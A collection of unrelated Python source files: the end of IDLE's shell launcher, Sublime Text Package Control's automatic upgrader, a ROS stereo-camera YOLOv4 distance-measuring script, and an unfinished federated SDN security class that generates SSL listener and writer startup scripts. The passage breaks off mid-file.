for o, a in opts: if o == '-c': cmd = a enable_shell = True if o == '-d': debug = True enable_shell = True if o == '-e': enable_edit = True if o == '-h': sys.stdout.write(usage_msg) sys.exit() if o == '-i': enable_shell = True if o == '-n': print(" Warning: running IDLE without a subprocess is deprecated.", file=sys.stderr) use_subprocess = False if o == '-r': script = a if os.path.isfile(script): pass else: print("No script file: ", script) sys.exit() enable_shell = True if o == '-s': startup = True enable_shell = True if o == '-t': PyShell.shell_title = a enable_shell = True if args and args[0] == '-': cmd = sys.stdin.read() enable_shell = True # process sys.argv and sys.path: for i in range(len(sys.path)): sys.path[i] = os.path.abspath(sys.path[i]) if args and args[0] == '-': sys.argv = [''] + args[1:] elif cmd: sys.argv = ['-c'] + args elif script: sys.argv = [script] + args elif args: enable_edit = True pathx = [] for filename in args: pathx.append(os.path.dirname(filename)) for dir in pathx: dir = os.path.abspath(dir) if not dir in sys.path: sys.path.insert(0, dir) else: dir = os.getcwd() if dir not in sys.path: sys.path.insert(0, dir) # check the IDLE settings configuration (but command line overrides) edit_start = idleConf.GetOption('main', 'General', 'editor-on-startup', type='bool') enable_edit = enable_edit or edit_start enable_shell = enable_shell or not enable_edit # start editor and/or shell windows: root = Tk(className="Idle") # set application icon icondir = os.path.join(os.path.dirname(__file__), 'Icons') if system() == 'Windows': iconfile = os.path.join(icondir, 'idle.ico') root.wm_iconbitmap(default=iconfile) elif TkVersion >= 8.5: ext = '.png' if TkVersion >= 8.6 else '.gif' iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext)) for size in (16, 32, 48)] icons = [PhotoImage(file=iconfile) for iconfile in iconfiles] root.wm_iconphoto(True, *icons) fixwordbreaks(root) root.withdraw() flist = PyShellFileList(root) macosxSupport.setupApp(root, flist) if enable_edit: if not (cmd or script): for filename in args[:]: if flist.open(filename) is None: # filename is a directory actually, disconsider it args.remove(filename) if not args: flist.new() if enable_shell: shell = flist.open_shell() if not shell: return # couldn't open shell if macosxSupport.isAquaTk() and flist.dict: # On OSX: when the user has double-clicked on a file that causes # IDLE to be launched the shell window will open just in front of # the file she wants to see. Lower the interpreter window when # there are open files. shell.top.lower() else: shell = flist.pyshell # Handle remaining options. If any of these are set, enable_shell # was set also, so shell must be true to reach here. if debug: shell.open_debugger() if startup: filename = os.environ.get("IDLESTARTUP") or \ os.environ.get("PYTHONSTARTUP") if filename and os.path.isfile(filename): shell.interp.execfile(filename) if cmd or script: shell.interp.runcommand("""if 1: import sys as _sys _sys.argv = %r del _sys \n""" % (sys.argv,)) if cmd: shell.interp.execsource(cmd) elif script: shell.interp.prepend_syspath(script) shell.interp.execfile(script) elif shell: # If there is a shell window and no cmd or script in progress, # check for problematic OS X Tk versions and print a warning # message in the IDLE shell window; this is less intrusive # than always opening a separate window. tkversionwarning = macosxSupport.tkVersionWarning(root) if tkversionwarning: shell.interp.runcommand("print('%s')" % tkversionwarning) while flist.inversedict: # keep IDLE running while files are open. root.mainloop() root.destroy() capture_warnings(False) if __name__ == "__main__": sys.modules['PyShell'] = sys.modules['__main__'] main() capture_warnings(False) # Make sure turned off; see issue 18081
automatic_upgrader.py
import threading import re import os import datetime import locale # To prevent import errors in thread with datetime import time import functools import sublime from .show_error import show_error from .console_write import console_write from .package_installer import PackageInstaller from .package_renamer import PackageRenamer from .open_compat import open_compat, read_compat from .settings import pc_settings_filename, load_list_setting class AutomaticUpgrader(threading.Thread): """ Automatically checks for updated packages and installs them. controlled by the `auto_upgrade`, `auto_upgrade_ignore`, and `auto_upgrade_frequency` settings. """ def __init__(self, found_packages, found_dependencies): """ :param found_packages: A list of package names for the packages that were found to be installed on the machine. :param found_dependencies: A list of installed dependencies found on the machine """ self.installer = PackageInstaller() self.manager = self.installer.manager self.load_settings() self.package_renamer = PackageRenamer() self.package_renamer.load_settings() self.auto_upgrade = self.settings.get('auto_upgrade') self.auto_upgrade_ignore = self.settings.get('auto_upgrade_ignore') self.load_last_run() self.determine_next_run() # Detect if a package is missing that should be installed self.missing_packages = list(set(self.installed_packages) - set(found_packages)) self.missing_dependencies = list(set(self.manager.find_required_dependencies()) - set(found_dependencies)) if self.auto_upgrade and self.next_run <= time.time(): self.save_last_run(time.time()) threading.Thread.__init__(self) def load_last_run(self): """ Loads the last run time from disk into memory """ self.last_run = None self.last_run_file = os.path.join(sublime.packages_path(), 'User', 'Package Control.last-run') if os.path.isfile(self.last_run_file): with open_compat(self.last_run_file) as fobj: try: self.last_run = int(read_compat(fobj)) except ValueError: pass def determine_next_run(self): """ Figure out when the next run should happen """ self.next_run = int(time.time()) frequency = self.settings.get('auto_upgrade_frequency') if frequency: if self.last_run: self.next_run = int(self.last_run) + (frequency * 60 * 60) else: self.next_run = time.time() def save_last_run(self, last_run): """ Saves a record of when the last run was :param last_run: The unix timestamp of when to record the last run as """ with open_compat(self.last_run_file, 'w') as fobj: fobj.write(str(int(last_run))) def load_settings(self): """ Loads the list of installed packages """ self.settings = sublime.load_settings(pc_settings_filename()) self.installed_packages = load_list_setting(self.settings, 'installed_packages') self.should_install_missing = self.settings.get('install_missing') def run(self): self.install_missing() if self.next_run > time.time(): self.print_skip() return self.upgrade_packages() def install_missing(self): """ Installs all packages that were listed in the list of `installed_packages` from Package Control.sublime-settings but were not found on the filesystem and passed as `found_packages`. Also installs any missing dependencies. """ # We always install missing dependencies - this operation does not # obey the "install_missing" setting since not installing dependencies # would result in broken packages. if self.missing_dependencies: total_missing_dependencies = len(self.missing_dependencies) dependency_s = 'ies' if total_missing_dependencies != 1 else 'y' console_write(u'Installing %s missing dependenc%s' % (total_missing_dependencies, dependency_s), True) dependencies_installed = 0 for dependency in self.missing_dependencies: if self.installer.manager.install_package(dependency, is_dependency=True): console_write(u'Installed missing dependency %s' % dependency, True) dependencies_installed += 1 if dependencies_installed: def notify_restart(): dependency_was = 'ies were' if dependencies_installed != 1 else 'y was' message = (u'%s missing dependenc%s just ' + u'installed. Sublime Text should be restarted, otherwise ' + u'one or more of the installed packages may not function ' + u'properly.') % (dependencies_installed, dependency_was) show_error(message) sublime.set_timeout(notify_restart, 1000) # Missing package installs are controlled by a setting if not self.missing_packages or not self.should_install_missing: return total_missing_packages = len(self.missing_packages) if total_missing_packages > 0: package_s = 's' if total_missing_packages != 1 else '' console_write(u'Installing %s missing package%s' % (total_missing_packages, package_s), True) # Fetching the list of packages also grabs the renamed packages self.manager.list_available_packages() renamed_packages = self.manager.settings.get('renamed_packages', {}) for package in self.missing_packages: # If the package has been renamed, detect the rename and update # the settings file with the new name as we install it if package in renamed_packages: old_name = package new_name = renamed_packages[old_name] def update_installed_packages(): self.installed_packages.remove(old_name) self.installed_packages.append(new_name) self.settings.set('installed_packages', self.installed_packages) sublime.save_settings(pc_settings_filename()) sublime.set_timeout(update_installed_packages, 10) package = new_name if self.installer.manager.install_package(package): console_write(u'Installed missing package %s' % package, True) def print_skip(self): """ Prints a notice in the console if the automatic upgrade is skipped due to already having been run in the last `auto_upgrade_frequency` hours. """ last_run = datetime.datetime.fromtimestamp(self.last_run) next_run = datetime.datetime.fromtimestamp(self.next_run) date_format = '%Y-%m-%d %H:%M:%S' message_string = u'Skipping automatic upgrade, last run at %s, next run at %s or after' % ( last_run.strftime(date_format), next_run.strftime(date_format)) console_write(message_string, True) def upgrade_packages(self): """ Upgrades all packages that are not currently upgraded to the lastest version. Also renames any installed packages to their new names. """ if not self.auto_upgrade: return self.package_renamer.rename_packages(self.installer) package_list = self.installer.make_package_list(['install', 'reinstall', 'downgrade', 'overwrite', 'none'], ignore_packages=self.auto_upgrade_ignore) # If Package Control is being upgraded, just do that and restart for package in package_list: if package[0] != 'Package Control': continue def reset_last_run(): # Re-save the last run time so it runs again after PC has # been updated self.save_last_run(self.last_run) sublime.set_timeout(reset_last_run, 1) package_list = [package] break if not package_list: console_write(u'No updated packages', True) return console_write(u'Installing %s upgrades' % len(package_list), True) disabled_packages = [] def do_upgrades(): # Wait so that the ignored packages can be "unloaded" time.sleep(0.7) for info in package_list: if info[0] in disabled_packages: # We use a functools.partial to generate the on-complete callback in # order to bind the current value of the parameters, unlike lambdas. on_complete = functools.partial(self.installer.reenable_package, info[0]) else: on_complete = None self.installer.manager.install_package(info[0]) version = re.sub('^.*?(v[\d\.]+).*?$', '\\1', info[2]) if version == info[2] and version.find('pull with') != -1: vcs = re.sub('^pull with (\w+).*?$', '\\1', version) version = 'latest %s commit' % vcs message_string = u'Upgraded %s to %s' % (info[0], version) console_write(message_string, True) if on_complete: sublime.set_timeout(on_complete, 700) # Disabling a package means changing settings, which can only be done # in the main thread. We then create a new background thread so that # the upgrade process does not block the UI. def disable_packages(): packages = [info[0] for info in package_list] disabled_packages.extend(self.installer.disable_packages(packages, 'upgrade')) threading.Thread(target=do_upgrades).start() sublime.set_timeout(disable_packages, 1)
binocular_measuring_cv.py
#!/usr/bin/env python3 # Francesco Marrato 2021-03-17 # Hope you like lists, multithreading, and buffers from sensor_msgs.msg import Image # will show error but is fine from cv_bridge import CvBridge # will show error but is fine from binocular_p3.msg import Vision_Object # will show error but is fine from colorama import Fore, Style from scipy.spatial import distance as dist from math import isclose import traceback import numpy as np import cv2 import atexit import sys import time import queue import rospy # will show error but is fine import threading import multiprocessing #=======================================CHANGE THESE TO YOUR DIRECTORY===================================================== #Unfortunately becuase of how the code is initialized by ros, relative paths can be pretty convoluted #So instead we are doing absolute path # baked YOLOv4 network files yolo_config = "/home/francm/elec-490-2020-2021/src/binocular_p3/src/yoloV4_network_files/TinyNet/yolov4-tiny-custom-Capstone.cfg" yolo_names = "/home/francm/elec-490-2020-2021/src/binocular_p3/src/yoloV4_network_files/obj_networkV2.names" yolo_weights = "/home/francm/elec-490-2020-2021/src/binocular_p3/src/yoloV4_network_files/TinyNet/yolov4-tiny-custom-Capstone_last.weights" #========================================================================================================================== # Frame buffers for incoming camera feed frame_buffer_left = queue.Queue(maxsize=60) # approximately 3 seconds of footage frame_buffer_right = queue.Queue(maxsize=60) # Frame buffers for frames pushed through the dnn dnn_buffer_left = multiprocessing.Queue(maxsize=60) dnn_buffer_right = multiprocessing.Queue(maxsize=60) # CONSTANTS (created for ease of tuning, globals are not necessary in design) KILL_THREADS = False # kills continuous multithreaded/multiprocessed tasks CATEGORIES = None # used for output drawing CATEGORIES_COLORS = None MIN_CONFIDENCE = 0.7 FRAME_HEIGHT = 576 FRAME_WIDTH = 720 # used to artificially reduce the framerate for increased blob size left_count = 0 right_count = 0 FRAME_INTERVAL = 1 CAM_SYNC_THRESH = 0.001 * 50 # microseconds BLOB_SIZE = 32 * 13 # blob sizes have to be multiples of 32. Size vs Accuracy tradeoff (size up = system lag) FOCAL_LENGTH = 35.90984# 0.03590984 # 35.90984 mm BASELINE = 0.75 # 0.75 m ### PHYSICAL CAMERA PARAMETERS ### """ Unity Physical Camera Parameters FOV: 52.7595 H, 39.2228 V (Degrees) Focal Length: 35.90984 (mm) Sensor Size: 35.62mm x, 25.59mm y Gate Fit: None Lens Shift: 0X, 0Y Resolution: 720x576 Baseline = 0.75m """ ### PHYSICAL CAMERA PARAMETERS ### def bino_instance_classifier(left_objects, right_objects): """ :param left_objects: [image np.array, [[x top, y left, width, height] for each classified item]] :param right_objects: [image np.array, [[x top, y left, width, height] for each classified item]] :return: list of instances and their distances I'm sorry... the inputs are a bit confusing """ # Left camera frame is considered reference (master) and right camera is considered target (slave) instances = [] if len(left_objects[1])>0 and len(right_objects[1])>0: # if there are identified objects in both frames left_centroid_point = left_objects[1][:,0:2] # strip centroid position from all objects right_centroid_point = right_objects[1][:,0:2] centroid_euclidean_distances = dist.cdist(left_centroid_point, right_centroid_point, metric='euclidean') # ^ calculate matrix of euclidean distances from each object for reference_index, row in enumerate(centroid_euclidean_distances): # for each object in the left frame target_index = row.argmin() # find object with minimum distance to reference frame object # check if object width is within 15% size_match = isclose(left_objects[1][reference_index, 2], right_objects[1][target_index,2], rel_tol=0.15) \ and isclose(left_objects[1][reference_index, 3], right_objects[1][target_index,3], rel_tol=0.15) # Category has to match too category_match = True if left_objects[1][reference_index, 4] == right_objects[1][target_index,4] else False if size_match and category_match: # instance match found # Calculate Distances based off of centroid left_params = left_objects[1][reference_index] right_params = right_objects[1][target_index] distance = ((BASELINE*FOCAL_LENGTH)/(left_params[0]-right_params[0]))*10 instances.append([left_params[0], left_params[1], right_params[0], right_params[1], left_params[4], round(distance,2)]) return instances # return list of instances, including centroid position and class def read_buffer(dnn_net, output_layer, pub, msg): # reads the input camera feed, passes the frames through the neural network, instance classifies, than calculates distance global frame_buffer_left, frame_buffer_right, dnn_buffer_left, dnn_buffer_right while not KILL_THREADS: # pull frames from camera buffers if both buffers have frames and their capture time is within the limit # will need shutter sync in real time system if frame_buffer_left.qsize()>0 and frame_buffer_right.qsize()>0: left_image = frame_buffer_left.get() right_image = frame_buffer_right.get() dif = abs(left_image[1].to_sec() - right_image[1].to_sec()) if dif < CAM_SYNC_THRESH: # push both input frames through the dnn left_thread = multiprocessing.Process(name="left process", target=dnn_computation, args=(dnn_net, output_layer,left_image[0], True,)) right_thread = multiprocessing.Process(name="right process", target=dnn_computation, args=(dnn_net, output_layer, right_image[0], False,)) left_thread.start() right_thread.start() # ^ assure both processes are completed before continuing (process synchronization) if dnn_buffer_left.qsize()>0 and dnn_buffer_right.qsize()>0: # if both frames have returned classified objects process_return_left = dnn_buffer_left.get() process_return_right = dnn_buffer_right.get() # classify instances (e.g. match the cars seen in the left eye with the car in the right eye) instance = bino_instance_classifier(process_return_left, process_return_right) if len(instance) > 0: # TODO publish to topic for d in instance: msg.object = d[4]# class msg.distance = d[5] # duh msg.lefteye = [] # centroid left msg.lefteye = [int(d[0]), int(d[1])] msg.righteye = [] # centroid right msg.righteye = [int(d[2]), int(d[3])] pub.publish(msg) dist_text = str(d[5]) cv2.putText(process_return_left[0], dist_text, (d[0], d[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0) , 2) cv2.putText(process_return_right[0], dist_text, (d[2], d[3]), cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255, 255, 0), 2) gui_output = np.concatenate((process_return_left[0],process_return_right[0]), axis=1) cv2.imshow("Stereo Vision Distance Measuring - YOLOv4 - Instance Classification - Distance Measuring", gui_output) cv2.waitKey(1) else: print(Fore.YELLOW + "Frame skipped, sync difference: "+ Style.RESET_ALL + str(dif) + "s") print("input left: " + str(frame_buffer_left.qsize()) + "dnn left: " + str(dnn_buffer_left.qsize())) print("input right: " + str(frame_buffer_right.qsize()) + "dnn right: " + str(dnn_buffer_right.qsize())) def dnn_computation(yolo_net, layer_names, frame, LR): pre_process = cv2.dnn.blobFromImage(frame, 1 / 255.0, (BLOB_SIZE, BLOB_SIZE), swapRB=False, crop=False) yolo_net.setInput(pre_process) output_yolo = yolo_net.forward(layer_names) # Alternative could be considered (causes lag with large blob size) queue_frame, objects = frame_class_drawer(output_yolo, frame) if LR: dnn_buffer_left.put([queue_frame, objects],timeout=3) else: dnn_buffer_right.put([queue_frame, objects], timeout=3) def load_dnn_yolo(): # Loads the Darknet YOLOv4 network into OpenCV's DNN module. Preps DNN for use. global CATEGORIES, CATEGORIES_COLORS, FRAME_TIME_LEFT, FRAM CATEGORIES = open(yolo_names).read().strip().split("\n") # Pull labels from .names file CATEGORIES_COLORS = np.random.randint(0, 255, size=(len(CATEGORIES), 3), dtype="uint8") # assign unique color YOLOV4_NET = cv2.dnn.readNetFromDarknet(yolo_config, yolo_weights) OUTPUT_LAYER_NAMES = [YOLOV4_NET.getLayerNames()[i[0] - 1] for i in YOLOV4_NET.getUnconnectedOutLayers()] # retrun DNN object and Layer names of output layers return YOLOV4_NET, OUTPUT_LAYER_NAMES def left_callback(msg, args): # called when left camera receives an image, fills the left input image buffer global frame_buffer_left, left_count if(left_count > FRAME_INTERVAL): left_count = 0 left_decompressed = args[0].imgmsg_to_cv2(msg) # convert to OpenCV MAT format using cv_bridge try: buff_error = frame_buffer_left.put([left_decompressed, msg.header.stamp], timeout=3) except queue.Full: print(Fore.RED + "Left eye buffer is full" + Style.RESET_ALL) else: left_count = left_count + 1 def right_callback(msg,args): # same as above but for right camera global frame_buffer_right, right_count if(right_count > FRAME_INTERVAL): right_count = 0 right_decompressed = args[0].imgmsg_to_cv2(msg) try: buff_error = frame_buffer_right.put([right_decompressed, msg.header.stamp], timeout=3) except queue.Full: print(Fore.RED + "Right eye buffer is full" + Style.RESET_ALL) else: right_count = right_count + 1 def frame_class_drawer(output_yolo, frame): global CATEGORIES, CATEGORIES_COLORS boxes = [] confidences = [] classIDs = [] objects = [] nms_objects = [] for output in output_yolo: for instance in output: # extract the class ID and confidence (i.e., probability) of # the current object detection scores = instance[5:] classID = np.argmax(scores) confidence = scores[classID] # filter out weak predictions by ensuring the detected # probability is greater than the minimum probability if confidence > MIN_CONFIDENCE: # min_confidence: # scale the bounding box coordinates back relative to the # size of the image, keeping in mind that YOLO actually # returns the center (x, y)-coordinates of the bounding # box followed by the boxes' width and height box = instance[0:4] * np.array([FRAME_WIDTH, FRAME_HEIGHT, FRAME_WIDTH, FRAME_HEIGHT]) # TODO make W and H automatic (centerX, centerY, width, height) = box.astype("int") # use the center (x, y)-coordinates to derive the top and # and left corner of the bounding box x = int(centerX - (width / 2)) y = int(centerY - (height / 2)) roi_limit = np.shape(frame) # update our list of bounding box coordinates, confidences, # and class IDs boxes.append([x, y, int(width), int(height)]) confidences.append(float(confidence)) classIDs.append(classID) classification = CATEGORIES[classID] objects.append(np.array([centerX, centerY, width, height, classification], dtype=object)) idxs = cv2.dnn.NMSBoxes(boxes, confidences, MIN_CONFIDENCE, 0.3) if len(idxs) > 0: # loop over the indexes we are keeping for i in idxs.flatten(): # extract the bounding box coordinates (x, y) = (boxes[i][0], boxes[i][1]) (w, h) = (boxes[i][2], boxes[i][3]) # draw a bounding box rectangle and label on the image color = [int(c) for c in CATEGORIES_COLORS[classIDs[i]]] cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2) text = "{}: {:.4f}".format(CATEGORIES[classIDs[i]], confidences[i]) cv2.putText(frame, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2) nms_objects.append(objects[i]) return frame, np.asarray(nms_objects) # Pulled from: https://www.pyimagesearch.com/2018/11/12/yolo-object-detection-with-opencv/ def boot_print(): print(''' ██╗ ██╗ ██████╗ ██╗ ██████╗ ╚██╗ ██╔╝██╔═══██╗██║ ██╔═══██╗ ╚████╔╝ ██║ ██║██║ ██║ ██║ ╚██╔╝ ██║ ██║██║ ██║ ██║ ██║ ╚██████╔╝███████╗╚██████╔╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═════╝ ██████╗ ██╗███╗ ██╗ ██████╗ ██╔══██╗██║████╗ ██║██╔═══██╗ ██████╔╝██║██╔██╗ ██║██║ ██║ ██╔══██╗██║██║╚██╗██║██║ ██║ ██████╔╝██║██║ ╚████║╚██████╔╝ ╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ██████╗██╗ ██╗ ██╔════╝██║ ██║ ██║ ██║ ██║ ██║ ╚██╗ ██╔╝ ╚██████╗ ╚████╔╝ ╚═════╝ ╚═══╝ ''') def kill_all_threads(): # Flips KILL_THREAD boolean and holds (2s), ensuring multithreading shutdown global KILL_THREADS KILL_THREADS = True time.sleep(2) print("Killing threads...") if __name__ == '__main__': try: boot_print() net, output_layer = load_dnn_yolo() # Prep and gather DNN object and output layers ros_bridge_cv = CvBridge() # Create cv_bridge object for converting images to MAT format # publisher to custom message bino_pub = rospy.Publisher('vision_object', Vision_Object, queue_size=5) bino_msg = Vision_Object() read_buffer_thread = threading.Thread(target=read_buffer, args=(net, output_layer, bino_pub, bino_msg)) # create thread to read incoming image buffers read_buffer_thread.start() # start reading from buffers atexit.register(kill_all_threads) # will help catch any un-killed threads rospy.init_node('binocular_measurement') # create node for ROS # subscribe to both cameras left_cam = rospy.Subscriber('binocular_cv/left/normal', Image, left_callback, (ros_bridge_cv, read_buffer_thread)) right_cam = rospy.Subscriber('binocular_cv/right/normal', Image, right_callback, (ros_bridge_cv, read_buffer_thread)) print ("try========================================================================================") rospy.spin() except: # kills threads in event of error print ("except==========================================================================================") traceback.print_exc() kill_all_threads() finally: # kills threads in event of proper shutdown print ("finally==========================================================================================") kill_all_threads()
FederatedSDNSecurity.py
''' Created on 12 janv. 2016 @author: phm ''' # -------------------------------------- import yaml import FederatedSDNAdapter import random class FederatedSDNSecurity: ''' classdocs ''' def __init__(self, name): ''' Constructor ''' self.name=name self.secAgents=[] self.sdnAdaptor=FederatedSDNAdapter.FederatedSDNAdapter("") def getName(self): return self.name def addSecurityAgent(self, secAgent): self.secAgents.append(secAgent) def getListOfSecurityVNF_all(self): listOfVNF=[] secAg="" for secAg in self.secAgents: listOfVNF=listOfVNF+secAg.getListOfSecurityVNF() return listOfVNF def getListOfSecurityVNF_networkSegment(self, network_segment_id): #print "network_segment_id is", network_segment_id securityVNF=self.sdnAdaptor.getListOfSecurityVNF_networkSegment(network_segment_id) return securityVNF def getListOfSecurityVNF(self, fedAgent): return fedAgent.getListOfSecurityVNF() def getListOfCommunicationProtocols(self, fedAgent): return fedAgent.getListOfCommunicationProtocols() def getListOfCommunicationProtocolsAll(self): commProtocols=[] secAg="" for secAg in self.secAgents: commProtocols=commProtocols+secAg.getListOfCommunicationProtocols() return commProtocols def getListOfCommunicationProtocols_networkSegment(self, network_segment_id): secAg="" communicationProtocols=[] for secAg in self.secAgents: if (secAg.getNetworkSegment()==[network_segment_id]): communicationProtocols=communicationProtocols+secAg.getListOfCommunicationProtocols() return communicationProtocols # -------------------------------------- def startVNFOnNetworkSegment(self, network_segment_id, vnf, configuration): secAg="" for secAg in self.secAgents: #print "secAg.getNetworkSegment()", secAg.getNetworkSegment() if (secAg.getNetworkSegment()==[network_segment_id]): secAg.startVNF(vnf, configuration) def readYAMLfile(self, fileName): incomingIP="" incomingPort="" incomingPrivateKeyFile="" incomingPublicKeyFile="" outgoingIP="" outgoingPort="" outgoingPublicKeyFile="" identifier="" #outputFolder="C:\Users\phm\workspace\Federated SDN Security POC2\src\GeneratedCode" #outputFolder="/Users/phm/git/federated-sdn-security-poc/src/GeneratedCode" outputFolder="../GeneratedCode" #print "Begin readYAMLfile" with open(fileName, 'r') as stream: try: yamlObject=yaml.load(stream) #print yamlObject except yaml.YAMLError as exc: print(exc) for data in yamlObject.items(): #print data key="" vnf_network_segment="none" vnf_type="" cloudManagerId="" for item in data: #print item if (key=="clouds"): for cloudId in item.items(): for clouds in cloudId[1].items(): #print clouds if (clouds[0]=="CloudManager"): #print clouds[0], ":", clouds[1] cloudManagerId=clouds[1] elif (clouds[0]=="Network_segment"): #print clouds[0], ":", clouds[1] pass elif (clouds[0]=="VNF"): for VNFS in clouds[1].items(): #print VMs[0] for VNF in VNFS[1].items(): if (VNF[0]=="vnf_type"): vnf_type=VNF[1] elif (VNF[0]=="identifier"): identifier=VNF[1] elif (VNF[0]=="network_segment"): vnf_network_segment=VNF[1] self.startVNFOnNetworkSegment(vnf_network_segment, VNFS[0], vnf_type) print VNFS[0], "started on", vnf_network_segment, "with type", vnf_type elif (VNF[0]=="incomingIP"): incomingIP=VNF[1] print "incomingIP : " + VNF[1] elif (VNF[0]=="incomingPort"): incomingPort=VNF[1] print "incomingPort : " + VNF[1] elif (VNF[0]=="incomingPrivateKeyFile"): incomingPrivateKeyFile=VNF[1] print "incomingPrivateKeyFile : " + VNF[1] elif (VNF[0]=="incomingPublicKeyFile"): incomingPublicKeyFile=VNF[1] print "incomingPublicKeyFile : " + VNF[1] elif (VNF[0]=="outgoingIP"): outgoingIP=VNF[1] print "outgoingIP : " + VNF[1] elif (VNF[0]=="outgoingPort"): outgoingPort=VNF[1] print "outgoingPort : " + VNF[1] elif (VNF[0]=="outgoingPublicKeyFile"): outgoingPublicKeyFile=VNF[1] print "outgoingPublicKeyFile : " + VNF[1] # now generate the script if (vnf_type=="ENCRYPT"): f = open(outputFolder+"//"+ identifier+".py", 'w') f.write("#---- Python VNF startup for " + identifier + "---"+"\n") f.write("import SSL_listener"+"\n") f.write("import SSL_writer"+"\n") f.write("\n") f.write("incomingIP=" + "\"" + incomingIP + "\"" + "\n") f.write("incomingPort=" + incomingPort+"\n") f.write("incomingPrivateKeyFile="+"\"" +incomingPrivateKeyFile+"\"" +"\n") f.write("incomingPublicKeyFile="+"\"" + incomingPublicKeyFile+"\"" +"\n") f.write("outgoingIP="+"\"" +outgoingIP+"\"" +"\n") f.write("outgoingPort="+outgoingPort+"\n") f.write("outgoingPublicKeyFile="+"\"" +outgoingPublicKeyFile+"\"" +"\n") f.write("\n") f.write("def " +"start"+ identifier+"():"+"\n") f.write("\t"+"ssl_writer=SSL_writer.SSL_writer(outgoingIP,outgoingPort, outgoingPublicKeyFile)"+"\n") f.write("\t"+"incoming_ssl_EncryptionVNF= SSL_listener.SSL_listener(incomingIP, incomingPort, incomingPrivateKeyFile, incomingPublicKeyFile,ssl_writer)"+"\n") f.close() elif (vnf_type=="DECRYPT"): f = open(outputFolder+"//"+ identifier+".py", 'w') f.write("#---- Python VNF startup for " + identifier + "---"+"\n") f.write("import SSL_listener"+"\n") f.write("import SSL_writer"+"\n") f.write("\n") f.write("incomingIP=" + "\"" + incomingIP + "\"" + "\n") f.write("incomingPort=" + incomingPort+"\n") f.write("incomingPrivateKeyFile="+"\"" +incomingPrivateKeyFile+"\"" +"\n") f.write("incomingPublicKeyFile="+"\"" + incomingPublicKeyFile+"\"" +"\n") f.write("outgoingIP="+"\"" +outgoingIP+"\"" +"\n") f.write("outgoingPort="+outgoingPort+"\n") f.write("outgoingPublicKeyFile="+"\"" +outgoingPublicKeyFile+"\"" +"\n") f.write("\n") f.write("def "+"start"+ identifier+"():"+"\n") f.write("\t"+"ssl_writer=SSL_writer.SSL_writer(outgoingIP,outgoingPort, outgoingPublicKeyFile)"+"\n") f.write("\t"+"incoming_ssl_EncryptionVNF= SSL_listener.SSL_listener(incomingIP, incomingPort, incomingPrivateKeyFile, incomingPublicKeyFile,ssl_writer)"+"\n") f.close() elif (clouds[0]=="VMS"): for VMs in clouds[1].items(): #print VMs[0] for VNF in VMs[1].items(): if (VNF[0]=="vnf_type"): vnf_type=VNF[1] elif (VNF[0]=="identifier"): identifier=VNF[1] elif (VNF[0]=="network_segment"): vnf_network_segment=VNF[1] self.startVNFOnNetworkSegment(vnf_network_segment, VMs[0], vnf_type) print VMs[0], "started on", vnf_network_segment, "with type", vnf_type elif (VNF[0]=="incomingIP"): incomingIP=VNF[1] print "incomingIP : " + VNF[1] elif (VNF[0]=="incomingPort"): incomingPort=VNF[1] print "incomingPort : " + VNF[1] elif (VNF[0]=="incomingPrivateKeyFile"): incomingPrivateKeyFile=VNF[1] print "incomingPrivateKeyFile : " + VNF[1] elif (VNF[0]=="incomingPublicKeyFile"): incomingPublicKeyFile=VNF[1] print "incomingPublicKeyFile : " + VNF[1] elif (VNF[0]=="outgoingIP"): outgoingIP=VNF[1] print "outgoingIP : " + VNF[1] elif (VNF[0]=="outgoingPort"): outgoingPort=VNF[1] print "outgoingPort : " + VNF[1] elif (VNF[0]=="outgoingPublicKeyFile"): outgoingPublicKeyFile=VNF[1] print "outgoingPublicKeyFile : " + VNF[1] # now generate the script if (vnf_type=="LISTENER"): f = open(outputFolder+"//"+ identifier+".py", 'w') f.write("#---- Python VM startup for " + vnf_type + identifier + " ---" +"\n") f.write("import SSL_listener"+"\n") f.write("\n") f.write("incomingIP=" + "\"" + incomingIP + "\"" + "\n") f.write("incomingPort=" + incomingPort+"\n") f.write("incomingPrivateKeyFile="+"\"" +incomingPrivateKeyFile+"\"" +"\n") f.write("incomingPublicKeyFile="+"\"" + incomingPublicKeyFile+"\"" +"\n") f.write("outgoingIP="+"\"" +outgoingIP+"\"" +"\n") f.write("outgoingPort="+outgoingPort+"\n") f.write("outgoingPublicKeyFile="+"\"" +outgoingPublicKeyFile+"\"" +"\n") f.write("\n") f.write("def "+"start"+ identifier+"():"+"\n") f.write("\t"+"incoming_ssl_EncryptionVNF= SSL_listener.SSL_listener(incomingIP, incomingPort, incomingPrivateKeyFile, incomingPublicKeyFile,"+ "\""+"\" )"+"\n") f.write("#-------"+"\n") f.close() elif (vnf_type=="WRITER"): f = open(outputFolder+"//"+ identifier+".py", 'w') f.write("#---- Python VNF startup for " + vnf_type + "---" +"\n") f.write("import SSL_writer"+"\n") f.write("import time"+"\n") f.write("\n") f.write("outgoingIP="+"\"" +outgoingIP+"\"" +"\n") f.write("outgoingPort="+outgoingPort+"\n") f.write("outgoingPublicKeyFile="+"\"" +outgoingPublicKeyFile+"\"" +"\n") f.write("\n") f.write("def "+"start"+ identifier+"():"+"\n") f.write("\t"+"ssl_writer=SSL_writer.SSL_writer(outgoingIP,outgoingPort, outgoingPublicKeyFile)"+"\n") f.write("\t"+"while True:"+"\n") f.write("\t"+"\t"+"localtime=time.localtime(time.time())"+"\n") f.write("\t"+"\t"+"message= \"message from " + identifier + " \"" + " + " + " time.asctime(localtime)"+"\n") f.write("\t"+"\t"+"ssl_writer.writeMessage(message)"+"\n") f.write("\t"+"\t"+"time.sleep(10)"+"\n") f.close() elif (clouds[0]=="OutgoingChaining"): chainingstr="" for chaining in clouds[1].items(): for chainedVNF in chaining[1]: if (chainingstr==""): chainingstr=chainedVNF else: chainingstr=chainingstr+" seq "+ chainedVNF print chaining[0], ":", chainingstr # get the cloud manager and VNF manager elif (clouds[0]=="IncomingChaining"): chainingstr="" for chaining in clouds[1].items(): if (chaining[0]=="in_chaining"): for chainedVNF in chaining[1]: if (chainingstr==""): chainingstr=chainedVNF else: chainingstr=chainingstr+" seq "+ chainedVNF print chaining[0], ":", chainingstr elif (chaining[0]=="startup-order"): print "parsing 